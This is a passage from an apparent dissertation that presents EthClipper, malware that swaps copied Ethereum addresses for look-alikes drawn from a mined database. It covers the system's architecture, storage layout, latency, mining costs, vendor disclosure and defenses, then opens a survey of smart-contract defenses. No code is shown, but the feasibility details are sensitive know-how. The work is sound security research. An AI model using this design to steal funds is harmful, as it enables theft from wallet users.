    Fig. 3.7 shows the basic architecture of ClipperCloud. The distributed system can have one or
several servers. Each server has a compute module, which performs address mining, and it also has
a storage module, which saves mined addresses, along with their corresponding private keys. Each
server is responsible for storing addresses corresponding to a certain range of matching symbols,
while the compute module can produce addresses for any of the servers (because the result of the
random guessing is unpredictable). If the compute module on one server finds a matching address
for another server, it stores the result in a temporary buffer. When the buffer is full, the server
transfers these addresses over to the corresponding server — this procedure is called the cooperative
transfer. We conducted a preliminary testing using a high-performance Microsoft Azure H-Series
server with 60 CPUs, which revealed that the cooperative transfer overhead was between 200 and
300 megabytes per minute, while the available bandwidth is normally 1 Gbps in the uplink direction
and 9 Gbps in the downlink direction, which confirms that there is no risk of a traffic bottleneck
incurred by the cooperative transfer. Also, we experimentally confirm that despite the increased
network traffic, the cooperative transfer delivers at least 50% faster database population compared
to discarding out-of-range addresses — we attribute this phenomenon to the benefits of the usage
of direct memory access (DMA) or similar hardware extensions by the servers, which allow to
perform disk operations with minimal CPU involvement.
Compute Module and Address Mining: In order to conduct the EthClipper attack, the attacker
needs to have a large database of Ethereum accounts readily available for address substitution.
In this work, we call the process of population of such a database the address mining, which is
performed by the ClipperCloud module called the address miner. ClipperCloud address miner is
a multi-threaded program that generates random Ethereum accounts. For example, consider the
                                                  56


                                      Figure 3.7: ClipperCloud workflow.
address substitution depicted in Fig. 3.6. The bottom address in this figure will be stored in the
slot 48B7769616 (or 121998299810 ) within the ClipperCloud address space. Each address in the
ClipperCloud address space translates into an absolute address within one of the ClipperCloud
servers. The address miner, when a new account is created28 , either forwards the account to the
storage module, or eventually sends this account to the ClipperCloud server where it belongs (as
part of the cooperative transfer). If there is already an account stored in that slot, the new account
is ignored.
Fixed-Field Storage: The account records produced by the address miner should be stored at Clip-
perCloud in a way that any requested address substitute must be found very quickly — otherwise,
the malware will not be able to substitute the address in the victim’s clipboard within the short pe-
riod of time between copying and pasting of the address. To guarantee instant response to a record
search, ClipperCloud stores records as hexadecimal strings in a fixed-field database, so its total
storage requirement Stot can be calculated as Stot = (Sprk + Spa ) × 16N , where Sprk is the size of
a private key, Spa is the size of a public address, and N is the number of matching symbols (both
prefix and suffix). Since EthClipper targets only Ethereum users, Sprk and Spa can be replaced
   28
      By account we assume a pair made of a private key and corresponding public address. In Ethereum, the the address
of an account is calculated as a 160-bit prefix of the Keccak256 hash of the account’s public key.
                                                           57


                          Figure 3.8: Overview of the ClipperCloud storage format.
with their respective numerical values of 64 and 40 bytes, i.e., Stot = 104 × 16N .
      As shown in Fig. 3.8, the records in ClipperCloud are stored sequentially in fixed-sized fields.
The length of one field is 104 bytes (40-byte address concatenated with 64-byte private key). This
allows to access the records with the time complexity in the order of O(1). To access the record
within the file storage, the server needs to perform a single lseek29 operation within the data
file with the offset set as 104 × ([Ap              As ] − a0 ), where [Ap       As ] is the number resulting from
the concatenation of the prefix Ap and the suffix As ; a0 is the first value in the range of record
numbers assigned to the current ClipperCloud server. Additionally, ClipperCloud allocates storage
for cooperative transfer buffers, as well as a little space for logging successful requests (in order to
inform the attacker which accounts have stolen funds). Both of these additional storage components
remain constant and much smaller than the storage of records with substantially large N , so we
exclude these insignificant values from the storage analysis.
3.2.4: Address Mining Analysis
Each newly generated random address might match a previously stored ClipperCloud record. More-
over, the more addresses ClipperCloud generates, the higher the probability of collision with an
   29
      lseek is a system call in POSIX-compatible operating systems (e.g., Linux) that moves the read/write position
(called offset) within a file. This operation is intended to have a constant-time complexity.
                                                             58


already stored record, which slows down the rate of adding new records to the database of similar
addresses. Since the EthClipper attack is opportunistic by its nature, let us assert that 95% coverage
of available similar addresses is satisfactory for an attacker. In other words, we assume that the
ClipperCloud database is fully-mined if any given address request has a 95% probability of suc-
cess. Here, we deliver a formal argumentation regarding the compute complexity of the brute-force
similar address mining that is probabilistically necessary for achieving the 95% target coverage.
Claim 1: A random set of 3 · M integer numbers from the interval [0, M − 1] is expected to have
at least 0.95 · M distinct values.
Proof: Let us consider a set S of properly random numbers Si ∈ Z, 0 ≤ Si ≤ M − 1, and
|S| = 3M . Each number in the set is expected to have a certain probability of collision with at
least one other number in the set, i.e.:
                       p = P r(∃i ∈ [1, 3M ] ∃j ∈ [1, 3M ] : i 6= j ∧ Si = Sj )                   (3.1)
The expected value of p is consistent with the well-known birthday paradox [171], in which the
expected proportion of resulting distinct values C of m possible values in the random sample of
size n can be determined by the Taylor’s approximation, shown below, that delivers a provably
narrow margin of error [247]:
                                           C = 1 − e−
                                                       n/m
                                                                                                  (3.2)
Next, let us apply Eq. 3.2 towards the constraints described in Eq. 3.1:
                                                         1
                               C = 1 − e−        =1−        ≈ 0.95021
                                           3M/M
                                                                                                  (3.3)
                                                        e3
Therefore, the expected number of distinct values in the set of 3M random integer numbers between
0 and M − 1 is at least 95% of total possible distinct numbers, i.e., C ≥ 0.95 · M . ■
Corollary of Claim 1: In order to attain the coverage of at least 95% of similar addresses, the
                                                  59


attacker is expected to generate 3 · 16N random Ethereum accounts.
Proof: An Ethereum address is a 160-bit prefix of a Keccak256 digest of the public key of the
account, which is derived from the 256-bit random private key of the account via the secp256k1 el-
liptic curve algorithm [288]. Assuming that any hexadecimal digit position of an Ethereum address
expresses an equal probability of its 16 possible values (i.e, 0 through F ), then any subset of N
digits in a random address is essentially an integer number from the interval [0, 16N −1]. Therefore,
Claim 1 can be applied to the address mining by ClipperCloud, with M = 16N . Consequently, in
order for the attacker to achieve a minimum 95% coverage of similar addresses with N matching
digits, 3 · 16N random Ethereum accounts must be generated. ■
     For the purpose of generality, let us denote the multiplier 3 in Claim 1 as τ (i.e., τ = 3).
Following the same logic, we can leverage different target coverage values by changing τ . For
example, when τ = 1, we may expect at least 63% of database coverage, i.e.:
                                                         1
                                C = 1 − e−         =1−     ≈ 0.6321
                                              1M/M
                                                                                                (3.4)
                                                         e
     Similarly, when τ = 0.7, the approximate coverage is 50%, which means that the attacker needs
to generate 0.7 · 16N accounts to achieve 50% probability of successful N -digit match for a given
random address. To confirm the correctness of the above argumentation, we conducted a small
experiment for the case of 95% coverage: we generate 3 million random numbers between 0 and
999,999 in Python, adding them to the set that prohibits duplicates. The resulting size of the set
was 950,188, which is consistent with Eq. 3.3.
3.3: Implementation and Evaluation
3.3.1: Implementation
In order to demonstrate that EthClipper is feasible, we implement it and perform a thorough testing
of its parameters using four different hardware wallets from three manufacturers. We implement
our EthClipper malware prototype using Python 3.7.5 with socket and clipboard libraries. The
                                                   60


ClipperCloud prototype is implemented using Node.js JavaScript 10.15.2 with dgram, buffer, fs,
and Web3.js libraries. After the manufacturers of the hardware wallets deploy the defense, we
intend to publish the source code of our implementation under an open-source license for testing,
reproduction, independent evaluation, and follow-up research.
    We test our implementation using four hardware wallets: Ledger Nano X, Trezor One, KeepKey,
and Ledger Nano S. Ledger Nano X supports both Bluetooth and USB connections, but we use
only USB, for fair comparison. For Trezor One and KeepKey, we use the vendor’s bridge software
installed on Ubuntu 20.04, and the vendors’ web apps (Trezor Ethereum Wallet and ShapeShift)
in Google Chrome web browser. For the Ledger wallets, we use the vendor’s bridge software and
the vendor-provided cross-platform desktop GUI application. Then we execute the workflow of
the attack three times with each of the four wallets, confirming that the attack executes as expected
and that the similarity of the addresses shown for confirmation on the screen of the wallets indeed
have a deceptive quality on the human cognition.
3.3.2: Storage Requirement
EthClipper can be used with a wide spectrum of ClipperCloud configurations, thereby leverag-
ing the balance between the number of matching symbols, address mining time, address database
coverage, and the budget of the attacker. Table 3.1 shows some possible ClipperCloud storage con-
figurations that the attacker may use. As we can see from the table, if the attacker wants to match
only 4 symbols in the address, ClipperCloud needs to store about 6.5 megabytes of information.
However, in order to match 11 symbols, the storage requirement increases to over 1.6 petabytes,
which would require about 820 2-terabyte hard drives, which is unrealistic for most attackers. The
storage configurations for up to 9 matching symbols are easily attainable with retail storage devices
or affordable cloud solutions. The database matching 10 symbols, requiring 104 Tb, is also achiev-
able with relatively affordable retail options. For example, as of mid-April 2021, two WD EX4100
56TB off-the-shelf network access storage (NAS) units can provide the attacker with sufficient
memory for addresses with 10 matching symbols at a total cost of under $4,200. Thus, we assume
                                                  61


                        Table 3.1: Cumulative address storage requirement.
               Matching                             Storage requirement per server
                            EthClipper   Clipsa
               symbols                               1 server 5 servers 10 servers
                   4            3           3        6.5 Mb      1.6 Mb      665.6 Kb
                   5            3           7        104 Mb      20.8 Mb      10.4 Mb
                   6            3           7       1.625 Gb 332.8 Mb 166.4 Mb
                   7            3           7         26 Gb       5.2 Gb       2.6 Gb
                   8            3           7        416 Gb      83.2 Gb      41.6 Gb
                   9            3           7         6.5 Tb      1.3 Tb     665.6 Gb
                   10           3           7        104 Tb      20.8 Tb      10.4 Tb
                   11           3           7       1.625 PB 332.8 Tb 166.4 Tb
that the attacker’s ClipperCloud database has the maximum capability for replacing 10 symbols,
which is 25% of the total Ethereum address length. Unlike Clipsa, EthClipper allows to match
larger number of symbols in the address, thereby substantially increasing the odds of success.
3.3.3: Query Latency Evaluation
The delay between the address request submitted by EthClipper malware and the response by Eth-
Cloud, denoted the query latency, is crucial for the success of the attack because the address has to
be replaced with the similar one before the user pastes the address to the wallet client. In order to
evaluate the delay of similar address requests, we conduct 5 experiments, each including 20 mea-
surements (100 measurements total). For each experiment, we exponentially increase the number
of addresses stored in one ClipperCloud server from 104 to 108 . Then, for each of the 5 experi-
ments, we measure the delay of requesting a similar Ethereum address in milliseconds. We use two
ClipperCloud servers (one in San Francisco, another one in New York) using DigitalOcean Droplet
service, both with the following configuration: CPU-Optimized 32-CPU servers with 400 Gb SSD,
64 Gb RAM, running Ubuntu 20.04 LTS x64. We test three different attacker’s Internet connection
types: 100 Mbps home cable modem, 60 Mbps home Wi-Fi, and 20 Mbps 4G LTE connection
(AT&T in the United States). Fig. 3.9a represents the results of the experiments. As we can see
from the evaluation, the similar address request time is consistent under different circumstances,
and is around 2 seconds. Most importantly, as the number of addresses grows exponentially, we
                                                  62


                (a) Address request.                           (b) Mined account transfer.
                               Figure 3.9: Average transmission delay.
observe only a slight increase in delay. Specifically, While the number of addresses increased by
1,000,000%, the delay increased only by 19.7%, which suggests that with larger database sizes the
latency will still remain low.
    Although it may be common to copy and paste text in under 2 seconds within a single window of
a frequently used application, in the case of cryptocurrency transfer, the address will undoubtedly
be copied from one application (e.g., web browser) and pasted into the hardware wallet client,
which may also involve the application switching step to bring the wallet app to the foreground.
Moreover, it is reasonable to assume that hardware wallet apps are not frequently used by most users
because every cryptocurrency transfer incurs paying blockchain fees. Therefore, the workflow of
the clipboard copy-paste cycle is likely to take more than 2 seconds on average. In our experiment,
in which we repeated the workflow of the attack 12 times on a laptop (3 times for each wallet), the
copy-paste delay exceeded 2 seconds each time (based on stopwatch measurements made by an
observing assistant).
Cooperative Account Transfer: We evaluated the delay of cooperative address transfer by con-
ducting 5 experiments, each including 20 measurements (100 measurements total). In each ex-
periment, we exponentially increased the number of addresses stored in each of the ClipperCloud
servers from 104 to 108 . Then, for each of the 5 experiments, we measured the delay of transferring
an Ethereum account from miner to cooperator in milliseconds, using two different ClipperCloud
                                                  63


servers (one in San Francisco, another one in New York). After that, we calculated the mean aver-
age and standard deviation of the 20 measurements for each experiment, and represented the results
in Fig. 3.9b.
    As we can see from the evaluation, the cooperative transfer time is consistent under different
circumstances, and is in the order of 4 seconds. Most importantly, as the number of addresses
grows exponentially, we observe only a slight increase in delay. Specifically, While the number of
addresses increased by 1,000,000%, the cooperative transfer delay increased only by 11.6%, which
suggests that the complexity of the account transfer is about O(1).
3.3.4: Address Mining Performance
In order to successfully conduct the EthClipper attack, the attacker needs a large database of
Ethereum accounts for address substitution, mined using a substantial compute power applied for
a lengthy period of time. Therefore, it is crucial to evaluate the ability of an attacker to mine a
ClipperCloud database with desired parameters using a reasonable time and budget. In order to
evaluate the performance of address mining by ClipperCloud, we deploy four different server con-
figurations. For the ease of reference, we give these configurations short code names: Azure, DO-,
DO+, and PC. Below are details of these configurations:
    • Azure: Microsoft Azure H-Series HB60rs high-performance virtual machine with 60 CPUs,
       223.52 Gb RAM, and 700 Gb of storage, running Ubuntu Server 20.04 LTS. The cost at the
       time of deployment (January 2021) was $1,664.40/mo.
    • DO-: DigitalOcean Basic Droplet with 1 vCPU, 1 Gb RAM and 25 Gb of storage, running
       Ubuntu 20.04 (LTS) x64. The cost at the time of deployment was $5/mo.
    • DO+: DigitalOcean CPU-Optimized Droplet with 32 CPUs, 64 Gb RAM, and 400 Gb of
       storage, running Ubuntu 20.04 (LTS) x64. The cost of the instance is $640/mo.
    • PC: Office PC with AMD Ryzen Threadripper x2950 CPU (16 cores, 32 threads), 70.6 Gb
       RAM, 1 Tb SSD storage, running Kubuntu 20.04 LTS.
    On each of the four configurations, we perform tests involving different number of simultaneous
                                                 64


address mining processes: 1, 2, 4, 8, 16, 32, 64, 128, and 256. Each process mines and saves
100,000 random Ethereum accounts. For each test, we measure the time needed for all the threads
to finish. Then, for each test, we calculate the mining performance measured in accounts per second
for each of the server configurations. Fig. 3.10 shows the results of the experiments. The DO-
server hung each time we attempted to run 32 simultaneous mining processes, therefore we were
only able to gather partial data for it. All the servers, except DO-, exhibit similar performance for 1,
2, 4, 8, and 16 simultaneous processes; however, the Azure server shows a significant performance
advantage with 32, 64, 128, and 256 simultaneous processes.
     Additionally, we evaluate how much time it would take for Azure, DO+, and PC to mine 50%
and 95% of the address database for 7, 8, 9, and 10 matching digits, with results shown in Fig 3.11.
Please recall Claim 1 for details of calculation of 95% coverage. For the 50% coverage, we use
the same Taylor approximation with τ = 0.7. First, we can see that, unsurprisingly, the Azure
deployment exhibits a significant performance advantage compared to DO+ and PC. However,
Azure is also the most expensive deployment out of the three. Second, the performance difference
between the DO+ and PC deployments is insignificant, and given a sizable rental cost of DO+, the
use of retail PC may be the most economic option for an attacker, depending on available budget
and other circumstances. Nevertheless, ClipperCloud is suitable for a flexible variety of possible
deployment scenarios For example, a realistic and affordable scenario would be to use 5 office
computers to mine a 50% address coverage. The number of days to mine the required coverage for
one 1 PC is 467.84, and if it is split between 5 computers, it would take 467.84/5 = 93.6 ≈ 3months.
Essentially, it means that the attacker will be able to run the ClipperCloud from home or office,
statistically capable of replacing 50% of incoming addresses with a 10-digit match, which is 25% of
all digits in an Ethereum address. Meanwhile, a small user study by Almutairi and Al-Megren [50]
demonstrated that 30% of users of the KeepKey wallet failed to recognize the substitution of a
Bitcoin address with 20% of matching symbols. Since EthClipper is an opportunistic attack, a
success rate around 30% is capable to yield a substantial gain for the attacker. Therefore, the
EthClipper attack is a realistic attack which can be launched by an attacker with relatively limited
                                                     65


                      Figure 3.10: ClipperCloud address mining performance.
         (a) 7 digits             (b) 8 digits             (c) 9 digits            (d) 10 digits
Figure 3.11: Time needed to achieve the target address mining coverage for 7, 8, 9, and 10 matching
digits.
resources.
3.3.5: Opinions from Manufacturers of Hardware Wallets
For responsible disclosure, we contacted all the manufacturers of the wallets used in this research,
and all of them confirmed the potential danger of the attack. Specifically the security representative
from ShapeShift stated, “[...] it would likely impact KeepKey users since in my experience, you are
right: most users either verify the first/last characters or none at all.” The security representative
from SatoshiLabs s.r.o. stated, “It’s quite obvious from the description how the attack works [...]”
The head of security research at Ledger SAS said, “The attack you described is a problem we
                                                   66


already discussed, and we did not find a satisfactory solution to tackle it. We would be happy to
collaborate with you in order to develop defenses against it.” Following the responses, we are in
the process of discussing a collaborative defense solution against the attack.
3.4: Security Recommendations and Defense
In this section, we discuss two categories of measures that can be used to prevent the EthClipper
attack: adherence to security recommendations and automated defense against the attack.
3.4.1: Security Recommendations
Recommendation 1. Resist confirmation bias: EthClipper is a hybrid attack with a substantial
social engineering component, which means that its success largely depends upon the ability of
the attacker to exploit the human cognitive bias of the user of a hardware wallet. Specifically,
the attack relies on the confirmation bias that forces the user to conclude that the actual recipient
address matches the intended one, based on a partial reading. However, a proper verification of the
entire address by the user, prior to sending funds to it, is sufficient to reveal the address substitution.
Therefore, a disciplined verification of the entire address by the user would deliver a reliable defense
against the EthClipper attack.
Recommendation 2. Pay attention to EIP-55 checksums: Ethereum clients often use address
checksums, also known as EIP-55 checksums, which are encoded in the addresses via selective
capitalization of certain hexadecimal letters. These checksums are primarily designed for software
clients to detect typos in hand-typed addresses; however, they can also be useful for uncovering an
EthClipper attack. Although an EIP-55 capitalization can be falsified [158], it would incur a sig-
nificant computation overhead for the ClipperCloud address miner30 , rendering the creation of the
address database impossible within a reasonable time frame. Consequently, the address substituted
by EthClipper would likely have different capitalization than the original one. Therefore, when ver-
ifying the correctness of Ethereum addresses, we recommend to pay attention to the capitalization
   30
      The probability of EIP-55 checksum collision is ≈0.0139% [55].
                                                         67


of their hexadecimal letters.
3.4.2: Automated Defense
In the spirit of reproducible and open research, we intend to make the source code of the EthClip-
per stack published after the defense is developed and incorporated by the wallet manufacturers.
The malware component of our stack can be reused to implement a resident program that issues
notifications or sound alarms each time a new Ethereum address is added to the operating sys-
tem clipboard. Moreover, we are in the process of submitting recommendations to all the vendors
of hardware wallets to incorporate the clipboard monitoring components into their desktop client
software. Specifically, a system alert issued by such a component upon detection of an Ethereum
address in the clipboard would effectively prevent the event of address substitution to be unnoticed
because the user will see a system notification alert each time an address appears or replaced in the
clipboard.
3.5: Related Work
The research related to hardware wallets mostly focuses on hardware vulnerabilities and feature
enhancements. Guri et al. [138] demonstrate a technique that allows for an attacker to exfiltrate pri-
vate keys from a hardware wallet by installing a malware directly on the wallet’s firmware. Gutoski
et al. [139] show that the hierarchical deterministic (HD) wallet design, used in all popular hard-
ware wallets, allows to reveal all the private keys in the hierarchy if only one of the private keys is
leaked; this research further proposes a new design of an HD wallet that allows to avoid such key
co-dependency. Several works in wireless sensing [184] demonstrate the ability to steal passcodes
from personal devices, possibly including hardware wallets. The above adversarial scenarios, how-
ever, assume that either the attacker has a physical access to the hardware wallet, or there is a partial
leak of wallet credentials — intuitively, both the scenarios are highly unlikely within the context
of the EthClipper attack, which zeroes in on the adversarial actions that the real world attackers
have been using successfully for decades, i.e., malware infestation of user computers and social
engineering. Datko et al. [104] demonstrate how the firmware of some hardware wallets can be
                                                  68


attacked to steal the user PIN code. San Pedro et al. [246] explore side-channel attacks that allow to
extract PIN codes and private keys from Trezor One hardware wallet — although the vulnerability
has been timely patched by the manufacturer, it demonstrates that the hardware and firmware com-
ponents of hardware wallets can also be attacked. Gkaniatsou et al. [131] show how the low-level
local communication protocol between the client software and the hardware wallet can be used for
side-channel attacks. Nevertheless, while breaking the air-gap protection of hardware crypto wal-
lets is unrelated to EthClipper, fixing the hardware vulnerabilities does not make hardware wallets
less susceptible to the EthClipper attack.
3.6: Chapter Summary
Hardware crypto wallets are relatively expensive and popular among the users who own large
amounts of cryptocurrency. These devices promise the protection of the stored funds even in the
event when the attacker gains full control over the victim’s computer, including the malware in-
vasion scenario. However, in this work we demonstrated that it is possible to compromise the
air-gapped security of a hardware wallet and fool its owner into confirming a malicious transaction,
even without jeopardizing the integrity of the wallet itself. Our EthClipper attack, which is con-
firmed to be potentially dangerous by the manufacturers of three leading hardware wallet firms, not
only falsifies the input to the hardware wallet, but it also crafts the address in a way that allows to
circumvent the transaction verification procedure. Our evaluation confirms that the attack can be
carried out with a limited budget on a retail equipment. As hardware wallets continue populating
the market, we anticipate a growing number of opportunistic social engineering attack attempts on
these wallets, and we believe that our work will raise the vigilance about such attacks. At the time
of writing, there is no affiliation or sponsorship, current or arranged, between the authors of this
work and the manufacturers of the hardware wallets used in this research.
                                                  69


CHAPTER 4: TAXONOMY OF DEFENSE
SOLUTIONS FOR SMART CONTRACTS31
4.1: Introduction
Blockchain is a decentralized network that sustains distributed records stored in immutable blocks
to form an ever-growing chain. In one decade, blockchain technology has evolved from the ledger
of cryptocurrency (e.g., Bitcoin, Monero) to the decentralized computing platform (e.g., Ethereum,
EOS) that allows the deployment and execution of smart contracts. Smart contract is a decentral-
ized program deployed on a blockchain that enforces the execution of protocols and agreements
without involving any third party or establishing a mutual trust [265]. A smart contract provides
a set of functions to be called via transactions and executed by the blockchain’s virtual machine
(VM). Most smart contracts are written in high-level special-purpose programming languages, such
as Solidity, JavaScript, or Vyper, and compiled into the blockchain VM bytecode. For example,
the Ethereum Virtual Machine (EVM) is the blockchain VM for executing smart contracts on the
Ethereum platform32 . An important feature of smart contracts is their ability to perform financial
operations with cryptocurrency and valuable custom tokens (e.g., ERC20, ERC721). As of March
2022, the total market capitalization of smart contracts exceeds 300 billion USD [28].
     The large amounts of valued assets stored and transacted by smart contracts made them lucrative
targets for attackers. Numerous security vulnerabilities and attacks on Ethereum smart contracts
have been hampering their widespread adoption [132, 255]. In the past few years, exploitations
of these vulnerabilities caused hundreds of millions of dollars in damages. For example, in June
  31
     This chapter is based on accepted work by Nikolay Ivanov, Chenning Li, Qiben Yan, Zhiyuan Sun, Zhichao Cao
and Xiapu Luo titled “Security Threat Mitigation For Smart Contracts: A Comprehensive Survey” to be published at
ACM Computing Surveys (CSUR) [157].
  32
     Although it is primarily associated with Ethereum, EVM has also been adopted by some other blockchain platforms,
such as Polygon [34] and RSK [35].
                                                          70


2016, about $150 million were stolen from the popular DAO contract [123]. In July 2017, about
$30 million were stolen from the Parity multi-signature wallet [73]. Not long after that, a bug in
the same multi-signature wallet caused the freeze of about $280 million [77].
     A large number of approaches and tools have been developed to address different types of smart
contract security issues. In this work, we use the term threat mitigation solutions to describe the full
spectrum of the active defense and passive preventative solutions aiming to reduce or eliminate the
threat associated with the exploitation of security vulnerabilities in smart contracts. These solutions
include both academic research efforts as well as commercial and open-source software products.
     Some surveys have been published that summarize vulnerabilities and attacks in smart con-
tracts [57,185]. Furthermore, the Smart Contract Weakness Classification and Test Cases database,
also known as the SWC Registry [42], identifies and describes 37 classes of known smart contract
vulnerabilities (as of March 2022). However, all the existing ways of systematizing smart contract
security knowledge focus primarily on vulnerabilities and attacks, paying very little or no attention
to the broad swath of defense and prevention mechanisms developed in the past decade. In this
work, we bridge the gap in the systematization of the threat mitigation solutions via the following
four steps: developing classification taxonomy, synthesizing design workflows of core methods
of threat mitigation, creating the map of vulnerability coverage, and conducting an evolutionary
analysis.
Step I. Taxonomy: The smart contract threat mitigation constitutes a diverse set of efforts, so find-
ing a uniform organizational methodology for all these solutions poses a major challenge. These
solutions employ a variety of techniques, such as symbolic execution [214, 223], formal verifica-
tion [83], static analysis [76, 310], to name a few. Some of these solutions target specific vulnera-
bilities, such as reentrancy [240] or integer overflow [261], while others are general-purpose [271].
Some threat mitigation solutions aim at detecting vulnerabilities [200], while others focus on ver-
ifying the safe property of a smart contract [230]. In other words, all these solutions vary within
multiple dimensions. In this survey, we formalize these dimensions and create a comprehensive
taxonomy of smart contract threat mitigation based on five dimensions: defense modality, core
                                                   71


method, targeted contracts, data mapping, and threat model.
Step II. Design Workflows: In addition to learning what the smart contract threat mitigation so-
lutions do, we also explore how they achieve their aimed goals — which is challenging due to a
wide variety of innovations and novel techniques employed by the existing solutions. In this work,
we study the design workflows of all the 133 smart contract threat mitigation solutions under our
investigation, and we subdivide them into eight core methods: static analysis, symbolic execution,
fuzzing, formal analysis, machine learning, execution tracing, code synthesis, and transaction in-
terception. Then, we synthesize the actual designs of the threat mitigation solutions corresponding
to each of the eight core methods and build eight uniform workflows that summarize the whole
variety of threat mitigation solutions for smart contracts.
Step III. Vulnerability Coverage: Next, we raise another important question: which known vul-
nerabilities are covered (i.e., prevented, detected, or unmasked) by the existing smart contract threat
mitigation solutions? Answering this question requires overcoming two significant challenges: i)
the lack of explicit and implicit declaration of addressed vulnerabilities by many threat mitigation
solutions, and ii) the lack of uniform definitions of smart contract vulnerabilities. To overcome
these challenges, we meticulously translate, group, or un-group the vulnerabilities referred to by
the authors of the threat mitigation solutions to match the vulnerability classification proposed by
the popular SWC Registry. Thus, we develop a unified vulnerability coverage map for these solu-
tions based on the SWC registry.
Step IV. Evolutionary Analysis: We perform an evidence-based evolutionary analysis of existing
smart contract threat mitigation solutions to identify trends and potential future research directions.
Specifically, we identify the three most promising vectors of development of smart contract threat
mitigation solutions: dynamic transaction interception, AI-driven security, and study of human-
machine interaction in smart contracts. In addition, we identify two major deficiencies of the exist-
ing body of threat mitigation solutions: the under-representation of non-Ethereum smart contracts
as targets and the lack of security-related large-scale measurements, especially related to off-chain
data.
                                                   72


      In summary, in this work, we make the following contributions:
      • We develop a five-dimensional threat mitigation taxonomy tailored for smart contracts, and
         we use this taxonomy to classify 133 existing smart contract threat mitigation solutions.
      • We pinpoint eight core methods adopted by the existing smart contract threat mitigation so-
         lutions, and we develop synthesized workflows of these methods to demonstrate the internal
         workings of smart contract threat mitigation.
      • We identify the threat mitigation solutions that explicitly declare protection against specific
         vulnerabilities, and we create a smart contract vulnerability coverage map for these solutions.
      • We identify trends and deficiencies of the existing smart contract mitigation solutions based
         on the findings of this survey and other solid evidence.
      • Finally, in the spirit of open research, we develop and publish a constantly updated online
         registry of threat mitigation solutions, called the STM Registry33 .
Organization: The rest of this work is organized as follows. First, we compare our work with
previous surveys related to smart contract security (Section 4.2). Then, we describe the methodol-
ogy employed in this survey (Section 4.3). After that, we classify 133 threat mitigation solutions
based on the developed five-dimensional taxonomy (Section 4.4), followed by a detailed compar-
ative description of designs of the eight core methods of threat mitigation (Section 4.5). Next, we
compare the threat mitigation methods by their ability to address specific known smart contract
vulnerabilities (Section 4.6). Then, we discuss trends and future perspectives of threat mitigation
in smart contracts (Section 4.7), and finally, we conclude our work (Section 5.8).
4.2: Prior Surveys
A number of previous surveys aimed at smart contract security have been published, which, how-
ever, have different perspectives than this survey. Atzei et al. [57] propose the first systematic
exposition of the Ethereum security vulnerabilities by organizing the vulnerabilities in three levels:
   33
      https://nick-ivanov.github.io/stmregistry/
                                                     73


Solidity34 , EVM35 bytecode, and blockchain. They also illustrate six influential attacks in different
application scenarios. In contrast, we primarily target vulnerability mitigation methods rather than
the classification of programming pitfalls. Jiachi et al. [92] propose an empirical survey that pro-
vides a systematic study of smart contract defects on the Ethereum platform from five aspects: se-
curity, availability, performance, maintainability, and re-usability. They collect and analyze smart
contract-related posts on Ethereum.StackExchange36 as well as real-world smart contracts to define
20 kinds of contract flaws and 5 relevant impacts. Zou et al. [311] perform an exploratory research
to illustrate the current state and potential challenges in smart contract development. Specifically,
they conduct semi-structured interviews with 20 developers and professionals, followed by a sur-
vey of 232 practitioners to confirm the 5 conclusions from the interviews that focus primarily on
smart contract development. In addition, Zhang et al. [302] present a new classification framework
for smart contract bugs and construct a dataset of 176 buggy smart contracts. Wang et al. [284] con-
duct an analysis of the security of Ethereum smart contracts and categorize these security challenges
into abnormal contracts, program vulnerabilities, and unsafe external data. Vacca et al. [272] pro-
vide a systematic review of techniques and tools used to address the software engineering-specific
challenges of blockchain-based applications by analyzing 96 papers. The above surveys summa-
rize smart contract security and development issues, while we focus on vulnerability mitigation
solutions.
      There are also a number of surveys that take the vulnerability mitigation solutions into consid-
eration. Huashan et al. [91] present a comprehensive and systematic survey on Ethereum systems
security which includes vulnerabilities, attacks, and defenses. The authors discuss 44 kinds of vul-
nerabilities based on the layers of the Ethereum architecture and describe the history, cause, tactic,
and direct impact of 26 attacks. As for defenses, the authors enumerate 47 defense mechanisms
and provide the best practices to guide contract development. Although they divide the defenses
into proactive and reactive, they are lacking an explanation of how the different tools are designed.
   34
      Solidity is an object-oriented programming language used mostly for writing Ethereum smart contracts.
   35
      The Ethereum Virtual Machine (EVM) is a software platform for executing Ethereum smart contracts. All smart
contracts are compiled into bytecode and run on the EVM of all Ethereum nodes.
   36
      https://ethereum.stackexchange.com/
                                                         74


Another survey by Wang and He et al. [282] reviews 6 kinds of vulnerability detection methods
and privacy protection techniques in 3 platforms (i.e., Ethereum, Hyperledger fabric and Corda),
and summarizes several commonly used tools for each method. Di Angelo et al. [107] investi-
gate 27 analysis tools of Ethereum smart contracts regarding availability, maturity level, methods
employed, and detection of security issues. They examine the availability and functionality of
the tools and compare their characteristics in a structured manner. In comparison, we carry out a
multi-dimensional classification of 133 solutions and take into account different aspects of threat
mitigation. Besides, we also analyze different defense mechanisms through their architecture. Fur-
thermore, Samreen et al. [245] review some detection tools and discuss eight vulnerabilities by
analyzing past exploitation cases. Ni et al. [222] propose a three-layered threat model for smart
contract security and introduce 15 major vulnerabilities of Ethereum at three levels: programming
language, virtual machine, and blockchain. They also summarize and compare the three most com-
monly used vulnerability mitigation techniques, viz., fuzzing, symbolic execution, and formal ver-
ification. Li et al. [185] survey the security threats of blockchain and enumerate 6 real attack cases.
They also review the security enhancement solutions for blockchain by introducing 5 commonly
used defense tools. In contrast, we categorize defenses in 5 orthogonal dimensions and compare
133 commonly used solutions. Praitheeshan et al. [233] review the security of Ethereum smart
contracts through 16 types of security vulnerabilities, 19 software security issues, and 3 defense
methods. For each defense method, they list several common tools but do not compare the differ-
ent methods and tools. In contrast, we summarize 5 more vulnerability core methods and compare
them through 5 dimensions. Moreover, we also construct a compact vulnerability map that contains
37 known vulnerabilities to summarize the vulnerability-addressing ability of 38 classes of threat
mitigation solutions.
    There are several studies that delve into a specific defense method (e.g., formal verification).
Tolmach et al. [268] scrutinize formal models and specifications of smart contracts. They categorize
the specifications of smart contracts in various application domains and propose a four-layered
framework to classify smart contract analysis methods. After that, they summarize the tools for
                                                    75


formal verification and group them based on the utilized techniques. In addition, the authors also
discuss the difficulties in smart contract verification and development. Similarly, Singh et al. [258]
conduct a systematic survey about current formalization research on all smart contract-enabled
blockchain platforms by summarizing 35 studies between 2015 and 2019. However, these studies
focus purely on formal verification without examining other types of threat mitigation. On the
contrary, we provide eight commonly used vulnerability mitigation core methods and identify future
research trends and directions in smart contract threat mitigation.
    Unlike the above surveys, which have insufficient technical depth or only focus on a specific
method, our survey comprehensively reviews the topic of eight commonly used core methods.
Overall, we undertake four major steps to shed light on the ever-evolving threat mitigation land-
